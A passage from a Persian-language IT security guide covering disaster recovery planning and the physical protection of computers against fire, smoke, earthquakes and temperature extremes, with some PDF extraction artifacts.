ﺳﺮﻗﺖ ﻳﺎ ﺧﺮﺍﺑﻲ ﺭﺍﻳﺎﻧﻪﻫﺎﻱ ﺧﻮﺩ ﺑﺮﻧﺎﻣﻪﺍﻱ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ .ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﻣﻮﺳﻮﻡ ﺑﻪ ﻃﺮﺡ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ٥٤ﺍﺳﺖ .ﺍﻳـﻦ ﺑﺮﻧﺎﻣـﻪ ﻫﻤﭽﻨـﻴﻦ ﺑﺎﻳـﺪ
ﺍﺟﺰﺍﻱ ﺍﻣﻨﻴﺘﻲ ﺧﻮﺩ ﺭﺍ ﻧﻴﺰ ﺩﺭ ﺑﺮ ﺑﮕﻴﺮﺩ؛ ﺑﻪ ﺍﻳﻦ ﻣﻌﻨﻲ ﮐﻪ ﺣﺘﻲ ﺯﻣﺎﻧﻴﻜﻪ ﺷﻤﺎ ﺩﺭ ﻳﮏ ﭘﺎﻳﮕﺎﻩ ﺳﺎﻧﺤﻪﺩﻳـﺪﻩ ﻣـﺸﻐﻮﻝ ﺑـﻪ ﮐـﺎﺭ ﻫـﺴﺘﻴﺪ ﻭ ﻳـﺎ
ﺳﻴﺴﺘﻢ ﺭﺍ ﺍﺯ ﻳﻚ ﺳﺎﻧﺤﻪ ﺗﺮﻣﻴﻢ ﻣﻲﻛﻨﻴﺪ ،ﺍﻳﺪﻩﺁﻝ ﺁﻥ ﺍﺳﺖ ﻛﻪ ﺍﺻﻮﻝ ﺍﻳﻤﻨﻲ ﻫﻤﭽﻨﺎﻥ ﺭﻋﺎﻳﺖ ﺷﻮﻧﺪ.
ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﻄﻮﺭ ﻣﻨﻈﻢ ﺑﺨﺸﻬﺎﻳﻲ ﺍﺯ ﺍﻳﻦ ﺑﺮﻧﺎﻣﻪ ﺭﺍ ﺑﺎ ﺍﺟﺎﺭﻩ ﻛﺮﺩﻥ ﻳﺎ ﻗﺮﺽ ﮔﺮﻓﺘﻦ ﻳﻚ ﺳﻴﺴﺘﻢ ﺭﺍﻳﺎﻧﻪ ﻭ ﺗﻼﺵ ﺑﺮﺍﻱ ﺍﺣﻴـﺎﻱ ﻧـﺴﺨﻪﻫـﺎﻱ
ﭘﺸﺘﻴﺒﺎﻥ ﺁﺯﻣﺎﻳﺶ ﻛﻨﻴﺪ .ﻫﻤﭽﻨﻴﻦ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑﺎ ﺗﻨﺎﻭﺏ ﻛﻤﺘﺮ ﺗﻤﺎﻡ ﺑﺮﻧﺎﻣﺔ ﺍﺭﺯﻳﺎﺑﻲ ﺭﺍ ﺍﺟﺮﺍ ﻛﻨﻴﺪ ﺗﺎ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺗﺴﻬﻴﻼﺕ ﺟﺎﻳﮕﺰﻳﻦ ﺩﺭ
ﺩﺳﺘﺮﺱ ﻫﺴﺘﻨﺪ ﻭ ﺯﻣﺎﻧﻴﻜﻪ ﺑﻪ ﺁﻧﻬﺎ ﻧﻴﺎﺯ ﺩﺍﺭﻳﺪ ﺩﺭﺳﺖ ﻛﺎﺭ ﻣﻲﻛﻨﻨﺪ.
ﺳﺎﻳﺮ ﺍﺣﺘﻤﺎﻻﺕ
ﻋﻼﻭﻩ ﺑﺮ ﺍﻗﻼﻣﻲ ﻛﻪ ﺫﻛﺮ ﺷﺪ ،ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺨﻮﺍﻫﻴﺪ ﺗﺄﺛﻴﺮ ﻣﻮﺍﺭﺩ ﺯﻳﺮ ﺭﺍ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﺧﻮﺩ ﻣﺸﺎﻫﺪﻩ ﻛﻨﻴﺪ:
ﻗﻄﻊ ﺧﺪﻣﺎﺕ ﺗﻠﻔﻦ ﻳﺎ ﺍﺗﺼﺎﻻﺕ ﺷﺒﻜﻪ
ﻗﻄﻊ ﺍﻳﻦ ﺧﺪﻣﺎﺕ ﻭ ﺍﺗﺼﺎﻻﺕ ﺭﻭﻱ ﻋﻤﻠﻴﺎﺕ ﻋﺎﺩﻱ ﺷﻤﺎ ﭼﻪ ﺗﺄﺛﻴﺮﻱ ﻣﻲﮔﺬﺍﺭﺩ؟
ﺗﺪﺍﻭﻡ ﻛﺎﺭ ﻓﺮﻭﺷﻨﺪﻩ
ﭘﺸﺘﻴﺒﺎﻧﻲ ﭼﻘﺪﺭ ﺍﻫﻤﻴﺖ ﺩﺍﺭﺩ؟ ﺍﮔﺮ ﻓﺮﻭﺷﻨﺪﻩ ﺗﻐﻴﻴﺮ ﺷﻐﻞ ﺩﻫﺪ ﻳﺎ ﺗﻐﻴﻴﺮﺍﺗﻲ ﺩﻫﺪ ﻛﻪ ﺷﻤﺎ ﻧﺨﻮﺍﻫﻴﺪ ﺧﻮﺩ ﺭﺍ ﺑﺎ ﺁﻥ ﻭﻓﻖ ﺩﻫﻴﺪ ،ﺁﻳﺎ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺑـﻪ
ﺳﻴﺴﺘﻢ ﺳﺨﺖﺍﻓﺰﺍﺭﻱ ﻳﺎ ﻧﺮﻡﺍﻓﺰﺍﺭﻱ ﺩﻳﮕﺮﻱ ﻣﻨﺘﻘﻞ ﺷﻮﻳﺪ؟
Disaster Recovery Plan
54
ﺑﺨﺶ ﭘﻨﺠﻢ :ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ ﻭ ﺭﺍﻫﺒﺮﺍﻥ ﻓﻨﻲ
٢٨١
ﻏﻴﺒﺖ ﻗﺎﺑﻞ ﻣﻼﺣﻈﻪ ﻛﺎﺭﻣﻨﺪﺍﻥ
ﺁﻳﺎ ﺍﻳﻦ ﻣﺴﺌﻠﻪ ﺭﻭﻱ ﺗﻮﺍﻧﺎﻳﻲ ﺍﻧﺠﺎﻡ ﻋﻤﻠﻴﺎﺕ ﺷﻤﺎ ﺗﺄﺛﻴﺮ ﻣﻲﮔﺬﺍﺭﺩ؟
ﻓﻮﺕ ،ﻣﻌﻠﻮﻟﻴﺖ ،ﻳﺎ ﻋﺰﻝ ﻳﻚ ﻋﻀﻮ ﻛﻠﻴﺪﻱ ﺳﺎﺯﻣﺎﻥ
ﺁﻳﺎ ﻫﺮ ﻋﻀﻮ ﺳﺎﺯﻣﺎﻥ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺷﻤﺎ ﻣﻲﺗﻮﺍﻧﺪ ﺟﺎﻳﮕﺰﻳﻦ ﺷﻮﺩ؟ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﺣﺘﻤﺎﻟﻲ ﭼﻴﺴﺘﻨﺪ؟
ﺑﺮﻧﺎﻣﻪﺭﻳﺰﻳﻬﺎﻱ ﺍﻧﺠﺎﻡﺷﺪﻩ ﺑﺮﺍﻱ ﺗﺮﻣﻴﻢ ﺳﻮﺍﻧﺢ ﺑﺎﻳﺪ ﻣﺘﻨﺎﺳﺐ ﺑﺎ ﺑﺮﻧﺎﻣﻪﻫﺎﻱ ﺍﻗﺘﻀﺎﺋﻲ ﺷـﻤﺎ ﺩﺭ ﮔـﺴﺘﺮﺓ ﺳـﺎﺯﻣﺎﻧﻲ ﺑﺎﺷـﻨﺪ .ﺣﻔـﻆ ﺍﻃﻼﻋـﺎﺕ
ﻣﻌﻤﻮ ﹰ
ﻻ ﺣﻴﺎﺗﻲ ﺍﺳﺖ ،ﻭﻟﻲ ﻭﻗﺘﻲ ﻓﻀﺎ ،ﻗﺪﺭﺕ ،ﻳﺎ ﺍﺑﺰﺍﺭ ﻻﺯﻡ ﺑﺮﺍﻱ ﺗﺪﺍﻭﻡ ﻋﻤﻠﻜﺮﺩ ﻧﺒﺎﺷﺪ ﻛﻤﺘﺮ ﻣﻔﻴﺪ ﺧﻮﺍﻫﺪ ﺑﻮﺩ.
ﺣﻔﺎﻇﺖ ﺍﺯ ﺳﺨﺖﺍﻓﺰﺍﺭ ﺭﺍﻳﺎﻧﻪ
ﺣﻔﺎﻇﺖ ﻓﻴﺰﻳﻜﻲ ﻳﻚ ﺭﺍﻳﺎﻧﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ ﻫﻤﺎﻥ ﻣﺴﺎﺋﻠﻲ ﺭﺍ ﺩﺭ ﺑﺮﺩﺍﺭﺩ ﻛﻪ ﻫﻨﮕﺎﻡ ﺣﻔﺎﻇﺖ ﻣﺎﺷـﻴﻦ ﺗﺤﺮﻳـﺮ ،ﺯﻳـﻮﺭﺁﻻﺕ ﻳـﺎ ﻛـﺸﻮﻫﺎﻱ ﭘـﺮ ﺍﺯ
ﭘﺮﻭﻧﺪﻩ ﺑﺎ ﺁﻥ ﻣﻮﺍﺟﻪ ﻣﻲﺷﻮﻳﻢ .ﻫﻤﺎﻧﻄﻮﺭ ﻛﻪ ﺩﺭ ﻣﻮﺭﺩ ﻳﻚ ﻣﺎﺷﻴﻦ ﺗﺤﺮﻳﺮ ﺻﺪﻕ ﻣﻲﻛﻨﺪ ،ﻳﻚ ﺭﺍﻳﺎﻧﺔ ﺩﻓﺘﺮﻱ ﻭﺳﻴﻠﻪﺍﻱ ﺍﺳﺖ ﻛﻪ ﺑﺴﻴﺎﺭﻱ ﺍﺯ
ﺍﻓﺮﺍﺩ ﺩﻓﺘﺮ ﺑﺎﻳﺪ ﺑﻪ ﺁﻥ ﺩﺳﺘﺮﺳﻲ ﺩﺍﺷﺘﻪ ﺑﺎﺷﻨﺪ .ﻣﺸﺎﺑﻪ ﺯﻳﻮﺭﺁﻻﺕ ،ﺭﺍﻳﺎﻧﻪﻫﺎ ﺑﺎﺍﺭﺯﺵ ﻫﺴﺘﻨﺪ ﻭ ﺑﻄﻮﺭ ﻛﻠﻲ ﻓﺮﻭﺵ ﺁﻧﻬﺎ ﺑﺮﺍﻱ ﻳﻚ ﺳﺎﺭﻕ ﺁﺳـﺎﻥ
ﺍﺳﺖ .ﻣﺎﻧﻨﺪ ﭘﺮﻭﻧﺪﻩﻫﺎﻱ ﻗﺎﻧﻮﻧﻲ ﻭ ﻣﺪﺍﺭﻙ ﻣﺎﻟﻲ ،ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻧﺪﺍﺷﺘﻪ ﺑﺎﺷﻴﺪ ﻳﺎ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫﻤﺮﺍﻩ ﺑﺎ ﺭﺍﻳﺎﻧﻪ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘـﻪ ﻳـﺎ
ﺧﺮﺍﺏ ﺷﺪﻩ ﺑﺎﺷﺪ -ﺍﻃﻼﻋﺎﺗﻲ ﻛﻪ ﺍﺯ ﺩﺳﺖ ﺩﺍﺩﻩﺍﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﻏﻴﺮﻗﺎﺑﻞ ﺟﺎﻳﮕﺰﻳﻨﻲ ﺑﺎﺷﺪ .ﺣﺘﻲ ﺍﮔﺮ ﻧﺴﺨﺔ ﭘﺸﺘﻴﺒﺎﻥ ﻫـﻢ ﺩﺍﺷـﺘﻪ ﺑﺎﺷـﻴﺪ
ﻫﻤﭽﻨﺎﻥ ﻻﺯﻡ ﺍﺳﺖ ﺑﺮﺍﻱ ﺑﺮﭘﺎﻳﻲ ﻳﻚ ﺳﻴﺴﺘﻢ ﺟﺎﻳﮕﺰﻳﻦ ﺯﻣﺎﻥ ﻗﺎﺑﻞ ﺗﻮﺟﻬﻲ ﺭﺍ ﺻﺮﻑ ﻛﻨﻴﺪ .ﻧﻜﺘﺔ ﺁﺧﺮ ﺍﻳﻨﻜﻪ ﻫﻤﻴﺸﻪ ﺍﻳﻦ ﺍﺣﺘﻤـﺎﻝ ﻭﺟـﻮﺩ
ﺩﺍﺭﺩ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ،ﻳﺎ ﺗﻨﻬﺎ ﺁﮔﺎﻫﻲ ﺍﺯ ﻫﻤﻴﻦ ﻧﻜﺘﻪ ﻛﻪ ﺍﻃﻼﻋﺎﺕ ﺷﻤﺎ ﺑﻪ ﺳﺮﻗﺖ ﺭﻓﺘﻪ ،ﻋﻠﻴﻪ ﺧﻮﺩ ﺷﻤﺎ ﺑﻜﺎﺭ ﺭﻭﺩ.
ﭼﻴﺰﻱ ﻛﻪ ﻣﺸﻜﻼﺕ ﺭﺍ ﺑﻴﺸﺘﺮ ﻣﻲﻛﻨﺪ ﺍﻳﻦ ﺍﺳﺖ ﻛﻪ ﺭﺍﻳﺎﻧﻪﻫﺎ ﻭ ﺭﺳﺎﻧﻪﻫﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﺗﺤﺖ ﺗﺄﺛﻴﺮ ﻣﺤـﻴﻂ ﺧـﻮﺩ ﻫـﺴﺘﻨﺪ .ﻳـﻚ ﻣﻨﺒـﻊ
ﺗﻐﺬﻳﺔ ﻗﺪﺭﺕ ﺭﺍﻳﺎﻧﻪ ﺍﮔﺮ ﺑﻪ ﺑﺮﻕ ﻭﺻﻞ ﺑﺎﺷﺪ ﻭ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﺻﺎﻋﻘﻪﺍﻱ ﺭﺥ ﺩﻫﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﺮﺍﺣﺘﻲ ﺑﺴﻮﺯﺩ.
ﺗﺪﺍﺑﻴﺮ ﻣﺨﺘﻠﻔﻲ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ﻛﻪ ﺑﺎ ﺍﺗﺨﺎﺫ ﺁﻧﻬﺎ ﻣﻲﺗﻮﺍﻥ ﺍﺯ ﺳﻴﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺩﺭ ﻣﻘﺎﺑﻞ ﺧﻄﺮﺍﺕ ﻓﻴﺰﻳﻜﻲ ﺣﻔﺎﻇﺖ ﻛـﺮﺩ .ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺍﻳـﻦ
ﺭﺍﻩﺣﻠﻬﺎ ﺳﻴﺴﺘﻢ ﺭﺍ ﺑﺼﻮﺭﺕ ﻫﻤﺰﻣﺎﻥ ﺍﺯ ﺑﻼﻳﺎﻱ ﻃﺒﻴﻌﻲ ،ﺍﻓﺮﺍﺩ ﺑﻴﺮﻭﻧﻲ ،ﻭ ﺍﺧﻼﻝﮔﺮﺍﻥ ﺩﺭﻭﻧﻲ ﻣﺤﻔﺎﻇﺖ ﻣﻲﻛﻨﻨﺪ.
ﺣﻔﺎﻇﺖ ﺩﺭ ﻣﻘﺎﺑﻞ ﺗﻬﺪﻳﺪﺍﺕ ﻣﺤﻴﻄﻲ
ﺁﺗﺶ
ﻻ ﺩﺭ ﻣﻘﺎﺑﻞ ﺁﺗﺶ ﺑﺴﻴﺎﺭ ﻛﻢ ﺩﻭﺍﻡ ﻣﻲﺁﻭﺭﻧﺪ .ﺍﮔﺮ ﻣﻲﺧﻮﺍﻫﻴﺪ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺍﺯ ﺍﻳﻦ ﻗﺎﻋـﺪﻩ ﻣـﺴﺘﺜﻨﻲ ﺑﺎﺷـﺪ ﺍﺯ ﻭﺟـﻮﺩ ﺗﺠﻬﻴـﺰﺍﺕ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﺁﺗﺶﻧﺸﺎﻧﻲ ﺧﻮﺏ ﺩﺭ ﻧﺰﺩﻳﻜﻲ ﻣﺤﻞ ﻭ ﻫﻤﭽﻨﻴﻦ ﺁﻣﻮﺯﺵ ﻛﺎﺭﻛﻨﺎﻥ ﺑﺮﺍﻱ ﺍﺳﺘﻔﺎﺩﺓ ﺧﻮﺏ ﺍﺯ ﺁﻧﻬﺎ ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴﺪ .ﺳﻴﺴﺘﻤﻬﺎﻱ ﺗﺨﻠﻴـﺔ
ﺍﺗﻮﻣﺎﺗﻴﻚ ﮔﺎﺯ ﻭ ﺩﺳﺘﮕﺎﻫﻬﺎﻱ ﺁﺑﭙﺎﺵ ﻗﻄﺮﻩﺍﻱ ﻫﺮ ﻛﺪﺍﻡ ﻣﺰﺍﻳﺎ ﻭ ﻣﻌﺎﻳﺒﻲ ﺩﺍﺭﻧﺪ ﻛﻪ ﺑﺎﻳﺪ ﺑﻪ ﺩﻗﺖ ﺩﺭﻧﻈﺮ ﮔﺮﻓﺘﻪ ﺷﻮﻧﺪ.
ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﻋﻼﻭﻩ ﺑﺮ ﺭﺍﻳﺎﻧﻪﻫﺎ ،ﺳﻴﻢﻛﺸﻲﻫﺎ ﻫﻢ ﻣﺤﻔﺎﻇﺖ ﺷﺪﻩﺍﻧﺪ .ﺍﻃﻤﻴﻨﺎﻥ ﺣﺎﺻﻞ ﻛﻨﻴـﺪ ﻛـﻪ ﺁﺷـﻜﺎﺭﮔﺮﻫﺎﻱ ﺩﻭﺩ ﻭ ﻛﻼﻫﻜﻬـﺎﻱ
ﺁﺑﭙﺎﺷﻬﺎﻱ ﻗﻄﺮﻩﺍﻱ -ﺍﮔﺮ ﺍﺳﺘﻔﺎﺩﻩ ﺷﺪﻩﺍﻧﺪ -ﻃﻮﺭﻱ ﻧﺼﺐ ﺷﺪﻩ ﺑﺎﺷﻨﺪ ﻛﻪ ﺳﻴﻤﻬﺎﻱ ﺩﺭﻭﻥ ﺳﻴﻨﻲﻫﺎﻱ ﻛﺎﺑﻞ )ﻏﺎﻟﺒﹰﺎ ﺩﺭ ﺑﺎﻻﻱ ﺳﻘﻔﻬﺎﻱ ﻛﺎﺫﺏ( ﻭ
ﻧﻴﺰ ﻛﺎﻧﺎﻟﻬﺎﻱ ﻛﺎﺑﻞ ﺭﺍ ﭘﻮﺷﺶ ﺩﻫﻨﺪ.
ﺑﺨﺶ ﭘﻨﺠﻢ
ﻼ ﻣﺘﻌﺎﺩﻟﻲ ﻧﻴﺎﺯ ﺩﺍﺭﻧﺪ .ﺑﻪ ﻫﻢ ﺧﻮﺭﺩﻥ ﺍﻳﻦ ﺗﻌﺎﺩﻝ ﻣﻤﻜـﻦ ﺍﺳـﺖ
ﻻ ﺑﺮﺍﻱ ﺻﺤﻴﺢ ﻛﺎﺭ ﻛﺮﺩﻥ ﺑﻪ ﺷﺮﺍﻳﻂ ﻓﻴﺰﻳﻜﻲ ﻭ ﻣﺤﻴﻂ ﻛﺎﻣ ﹰ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﻌﻤﻮ ﹰ
ﻻ ﻧﺎﺧﻮﺷﺎﻳﻨﺪ ﺩﭼﺎﺭ ﺧﺮﺍﺑﻲ ﺷﻮﺩ .ﺣﺘﻲ ﺑﺪﺗﺮ ﺍﺯ ﺁﻥ ،ﺭﺍﻳﺎﻧﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﻛﺎﺭ ﻧﺎﻣﻨﻈﻢ
ﺑﺎﻋﺚ ﺁﻥ ﺷﻮﺩ ﻛﻪ ﺭﺍﻳﺎﻧﻪ ﺑﺼﻮﺭﺗﻲ ﻏﻴﺮﻣﻨﺘﻈﺮﻩ ﻭ ﻣﻌﻤﻮ ﹰ
ﺧﻮﺩ ﺍﺩﺍﻣﻪ ﺩﻫﺪ ،ﻧﺘﺎﻳﺞ ﻏﻠﻂ ﺗﻮﻟﻴﺪ ﻛﻨﺪ ،ﻭ ﺍﻃﻼﻋﺎﺕ ﺑﺎ ﺍﺭﺯﺵ ﺭﺍ ﻣﺨﺪﻭﺵ ﻧﻤﺎﻳﺪ.
٢٨٢
ﺭﺍﻫﻨﻤﺎﻱ ﺍﻣﻨﻴﺖ ﻓﻨﺎﻭﺭﻱ ﺍﻃﻼﻋﺎﺕ
ﺩﻭﺩ
ﺩﻭﺩ ﺑﺮﺍﻱ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﺑﺴﻴﺎﺭ ﻣﺨﺮﺏ ﺍﺳﺖ .ﺩﻭﺩ ﺳﺎﻳﻨﺪﻩﺍﻱ ﻗﻮﻱ ﺍﺳﺖ ﻭ ﺭﻭﻱ ﺷﺎﺧﻜﻬﺎﻱ ﺩﻳﺴﻚ ﻣﻐﻨﺎﻃﻴـﺴﻲ ﺳـﺮﺑﺎﺯ ،ﺩﻳـﺴﻜﻬﺎﻱ
ﻧﻮﺭﻱ ﻭ ﻧﻮﺍﺭ ﮔﺮﺩﺍﻧﻬﺎ ﺟﻤﻊ ﻣﻲﺷﻮﺩ .ﮔﺎﻫﻲ ﺍﻭﻗﺎﺕ ﺩﻭﺩ ﺑﻮﺳﻴﻠﺔ ﺧﻮﺩ ﺭﺍﻳﺎﻧﻪ ﺗﻮﻟﻴﺪ ﻣﻲﺷﻮﺩ .ﺁﺗﺶﺳﻮﺯﻱﻫﺎﻱ ﺑﺮﻗﻲ -ﺑﻮﻳﮋﻩ ﺁﻧﻬﺎﻳﻲ ﻛﻪ ﺗﻮﺳﻂ
ﻣﺒﺪﻟﻬﺎﻱ ﻣﺎﻧﻴﺘﻮﺭﻫﺎﻱ ﻭﻳﺪﺋﻮﻳﻲ ﺑﻮﺟﻮﺩ ﺁﻣﺪﻩﺍﻧﺪ ﻣﻲﺗﻮﺍﻧﻨﺪ ﺩﻭﺩﻫﺎﻱ ﺗﻨﺪ ﻭ ﺯﻧﻨﺪﻩ ﺗﻮﻟﻴﺪ ﻛﻨﻨﺪ ﻛﻪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺳﺎﻳﺮ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍ ﺧﺮﺍﺏ ﻛﻨﺪ ﻭ
ﻧﻴﺰ ﺳﻤﻲ ﻳﺎ ﺳﺮﻃﺎﻧﺰﺍ ﺑﺎﺷﺪ .ﺧﻄﺮ ﻣﻬﻢ ﺩﻳﮕﺮ ﺩﻭﺩﻱ ﺍﺳﺖ ﻛﻪ ﺍﺯ ﺳﻴﮕﺎﺭﻫﺎ ﻭ ﭘﻴﭗﻫﺎ ﺑﺮ ﻣﻲﺧﻴﺰﺩ.
ﺩﺭ ﻫﺮ ﺍﺗﺎﻗﻲ ﻛﻪ ﺗﺠﻬﻴﺰﺍﺕ ﺭﺍﻳﺎﻧﻪﺍﻱ ﻭﺟﻮﺩ ﺩﺍﺭﺩ ،ﺁﺷﻜﺎﺭﮔﺮ ﺩﻭﺩ ٥٥ﻧﺼﺐ ﻛﻨﻴﺪ ﻭ ﻣﻄﻤﺌﻦ ﺷﻮﻳﺪ ﻛﻪ ﺍﻳﻦ ﺁﺷﻜﺎﺭﮔﺮﻫﺎ ﺩﺭ ﺯﻳﺮ ﻛﻒﻫﺎﻱ ﭘﻠـﻪﺍﻱ
ﻭ ﺑﺎﻻﻱ ﺳﻘﻒ ﻛﺎﺫﺏ ﻧﻴﺰ ﻭﺟﻮﺩ ﺩﺍﺭﻧﺪ .ﺩﺭ ﺍﺗﺎﻕ ﺭﺍﻳﺎﻧﺔ ﺧﻮﺩ ﺑﻪ ﻛﺴﻲ ﺍﺟﺎﺯﻩ ﺍﺳﺘﻌﻤﺎﻝ ﺩﺧﺎﻧﻴﺎﺕ ﻧﺪﻫﻴﺪ.
ﺯﻣﻴﻦﻟﺮﺯﻩ
ﺗﻘﺮﻳﺒﹰﺎ ﻫﻤﺔ ﻗﺴﻤﺘﻬﺎﻱ ﺯﻣﻴﻦ ،ﻟﺮﺯﺷﻬﺎﻱ ﻣﻮﺳﻤﻲ ﺭﺍ ﺗﺠﺮﺑﻪ ﻣﻲﻛﻨﺪ .ﺑﺮﺧﻲ ﺍﺯ ﺳﺎﺧﺘﻤﺎﻧﻬﺎ ﺩﺭ ﺯﻣﻴﻦﻟﺮﺯﻩ ﻓﺮﻭ ﻣـﻲﺭﻳﺰﻧـﺪ ﻭ ﺑـﺴﻴﺎﺭﻱ ﺍﺯ ﺁﻧﻬـﺎ
ﺳﺮﭘﺎ ﺑﺎﻗﻲ ﻣﻲﻣﺎﻧﻨﺪ .ﺗﻮﺟﻪ ﺩﻗﻴﻖ ﺑﻪ ﻧﺤﻮﺓ ﺍﺳﺘﻘﺮﺍﺭ ﻃﺎﻗﭽﻪﻫﺎ ﻭ ﻗﻔﺴﻪﻫﺎﻱ ﻛﺘﺎﺏ ﺩﺭ ﺩﻓﺘﺮﺗﺎﻥ ﻣـﻲﺗﻮﺍﻧـﺪ ﺍﺣﺘﻤـﺎﻝ ﺍﻳﻨﻜـﻪ ﺭﺍﻳﺎﻧـﻪ ﻭ ﺷـﻤﺎ ﺍﺯ
ﺷﺪﻳﺪﺗﺮﻳﻦ ﺳﻮﺍﻧﺢ ﺟﺎﻥ ﺳﺎﻟﻢ ﺑﺪﺭ ﺑﺮﻳﺪ ﺭﺍ ﺍﻓﺰﺍﻳﺶ ﺩﻫﺪ.
ﺍﺯ ﮔﺬﺍﺷﺘﻦ ﺭﺍﻳﺎﻧﻪ ﺩﺭ ﺍﺭﺗﻔﺎﻋﺎﺕ ﺯﻳﺎﺩ ﻳﺎ ﻧﺰﺩﻳﻚ ﭘﻨﺠﺮﻩ ﻭ ﻫﻤﻴﻨﻄﻮﺭ ﺍﺯ ﻗﺮﺍﺭﺩﺍﺩﻥ ﺍﺷﻴﺎﻱ ﺳﻨﮕﻴﻦ ﺭﻭﻱ ﻗﻔﺴﻪﻫﺎﻱ ﻧﺰﺩﻳـﻚ ﺭﺍﻳﺎﻧـﻪ ﺑﭙﺮﻫﻴﺰﻳـﺪ.
ﻣﻲﺗﻮﺍﻥ ﺭﺍﻳﺎﻧﻪﻫﺎ ﺭﺍ ﺯﻳﺮ ﻣﻴﺰﻫﺎﻱ ﻗﻮﻱ ﻗﺮﺍﺭﺩﺍﺩ ﻳﺎ ﺑﻪ ﺳﻄﺤﻲ ﻛﻪ ﺭﻭﻱ ﺁﻥ ﻗﺮﺍﺭ ﺩﺍﺭﻧﺪ ﻣﺘﺼﻞ ﻛﺮﺩ .ﺑﺮﺍﻱ ﺍﻳﻨﻜﺎﺭ ﻣﻲﺗﻮﺍﻧﻴﺪ ﺍﺯ ﭘـﻴﭻ ﻭ ﻣﻬـﺮﻩ،
ﻧﻮﺍﺭﻫﺎﻱ ﻧﮕﻬﺪﺍﺭﻧﺪﻩ ،ﻳﺎ ﺳﺎﻳﺮ ﻭﺳﺎﻳﻞ ﺍﺳﺘﻔﺎﺩﻩ ﻛﻨﻴﺪ) .ﺍﻧﺠﺎﻡ ﺍﻳﻨﻜﺎﺭ ﻫﻤﭽﻨﻴﻦ ﺑﻪ ﺟﻠﻮﮔﻴﺮﻱ ﺍﺯ ﺳﺮﻗﺖ ﻛﻤﻚ ﻣﻲﻛﻨﺪ(.
ﻛﻤﺘﺮﻳﻦ ﻭ ﺑﻴﺸﺘﺮﻳﻦ ﺩﻣﺎ
ﺭﺍﻳﺎﻧﻪﻫﺎ ﻣﺎﻧﻨﺪ ﺍﻓﺮﺍﺩ ﺩﺭ ﺩﺍﻣﻨﺔ ﺧﺎﺻﻲ ﺍﺯ ﺩﻣﺎ ﺧﻮﺏ ﻛﺎﺭ ﻣﻲﻛﻨﻨـﺪ .ﺍﻏﻠـﺐ ﺳﻴـﺴﺘﻤﻬﺎﻱ ﺭﺍﻳﺎﻧـﻪﺍﻱ ﺑﺎﻳـﺪ ﺩﺭ ﺩﻣـﺎﻳﻲ ﺑـﻴﻦ ۱۰ﺗـﺎ ۳۲ﺩﺭﺟـﺔ
ﺳﻠﺴﻴﻮﺱ ) ۵۰ﺗﺎ ۹۰ﺩﺭﺟﻪ ﻓﺎﺭﻧﻬﺎﻳﺖ( ﻧﮕﻬﺪﺍﺭﻱ ﺷﻮﻧﺪ .ﺍﮔﺮ ﺩﻣﺎﻱ ﻣﺤﻴﻂ ﺍﻃﺮﺍﻑ ﺭﺍﻳﺎﻧﺔ ﺷﻤﺎ ﺧﻴﻠﻲ ﺑﺎﻻ ﺭﻭﺩ ،ﺭﺍﻳﺎﻧﻪ ﻧﻤﻲﺗﻮﺍﻧﺪ ﺑﻪ ﺍﻧـﺪﺍﺯﺓ ﻛـﺎﻓﻲ
ﺧﻮﺩ ﺭﺍ ﺧﻨﻚ ﻛﻨﺪ ﻭ ﻣﻤﻜﻦ ﺍﺳﺖ ﺍﺟﺰﺍﻱ ﺩﺍﺧﻞ ﺁﻥ ﺁﺳﻴﺐ ﺑﺒﻴﻨﻨﺪ .ﺍﮔﺮ ﺩﻣﺎ ﺧﻴﻠﻲ ﭘﺎﻳﻴﻦ ﺑﻴﺎﻳﺪ ﻣﻤﻜﻦ ﺍﺳﺖ ﺑﻪ ﺳﻴﺴﺘﻢ ﺷﻮﻙ ﺣﺮﺍﺭﺗـﻲ ﻭﺍﺭﺩ
ﺷﻮﺩ ﻭ ﻭﻗﺘﻲ ﻛﺎﻣﭙﻴﻮﺗﺮ ﺭﻭﺷﻦ ﻣﻲﺷﻮﺩ ﺑﺮﺩﻫﺎﻱ ﻣﺪﺍﺭ ﻳﺎ ﻣﺪﺍﺭﻫﺎﻱ ﻣﺠﺘﻤﻊ ﺁﻥ ﺷﻜﺎﻑ ﺑﺮﺩﺍﺭﻧﺪ.
